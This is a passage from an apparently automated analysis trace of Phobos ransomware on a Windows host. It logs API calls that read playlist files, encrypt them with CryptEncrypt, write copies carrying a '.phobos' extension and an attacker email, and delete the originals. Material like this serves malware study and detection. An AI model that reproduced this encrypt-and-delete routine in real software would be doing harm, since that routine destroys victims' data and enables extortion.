Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.583] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1279) returned 1 [0186.584] CloseHandle (hObject=0x194) returned 1 [0186.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl")) returned 0x2020 [0186.584] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.584] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.584] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0186.585] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0186.585] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.585] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4ff, lpOverlapped=0x0) returned 1 [0186.693] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500, dwBufLen=0x500 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500) returned 1 [0186.693] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x500, lpOverlapped=0x0) returned 1 [0186.694] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0186.694] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.694] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0186.694] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.694] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0186.694] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.694] CloseHandle (hObject=0x194) returned 1 [0186.695] CloseHandle (hObject=0x180) returned 1 [0186.695] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl")) returned 1 [0186.696] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0186.696] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1267) returned 1 [0186.696] CloseHandle (hObject=0x180) returned 1 [0186.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl")) returned 0x2020 [0186.696] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0186.697] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.697] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.697] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0186.697] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.698] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4f3, lpOverlapped=0x0) returned 1 [0186.715] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500, dwBufLen=0x500 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500) returned 1 [0186.715] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x500, lpOverlapped=0x0) returned 1 [0186.716] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0186.716] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.716] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0186.717] CryptDestroyKey (hKey=0xa32c28) returned 1 [0186.717] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0186.717] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.717] CloseHandle (hObject=0x180) returned 1 [0186.717] CloseHandle (hObject=0x194) returned 1 [0186.717] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl")) returned 1 [0186.718] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.725] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1284) returned 1 [0186.725] CloseHandle (hObject=0x194) returned 1 [0186.725] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl")) returned 0x2020 [0186.726] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.726] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.726] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0186.727] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0186.727] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.727] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x504, lpOverlapped=0x0) returned 1 [0186.746] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x510, dwBufLen=0x510 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x510) returned 1 [0186.746] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x510, lpOverlapped=0x0) returned 1 [0186.747] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0186.747] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.747] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0186.747] CryptDestroyKey (hKey=0xa32c68) returned 1 [0186.747] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0186.747] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.747] CloseHandle (hObject=0x194) returned 1 [0186.747] CloseHandle (hObject=0x180) returned 1 [0186.747] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl")) returned 1 [0186.748] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0186.749] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=797) returned 1 [0186.749] CloseHandle (hObject=0x180) returned 1 [0186.749] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl")) returned 0x2020 [0186.749] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0186.749] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.749] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.750] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0186.750] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.750] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x31d, lpOverlapped=0x0) returned 1 [0186.771] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x320, dwBufLen=0x320 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x320) returned 1 [0186.771] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x320, lpOverlapped=0x0) returned 1 [0186.772] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0186.772] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.772] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0186.772] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0186.772] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0186.773] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.773] CloseHandle (hObject=0x180) returned 1 [0186.773] CloseHandle (hObject=0x194) returned 1 [0186.773] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl")) returned 1 [0186.774] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0186.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0186.806] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=785) returned 1 [0186.806] CloseHandle (hObject=0x134) returned 1 [0186.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl")) returned 0x2020 [0186.806] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0186.806] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.806] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0186.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0186.914] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0186.914] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.914] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x311, lpOverlapped=0x0) returned 1 [0186.915] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x320, dwBufLen=0x320 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x320) returned 1 [0186.915] WriteFile (in: hFile=0x194, 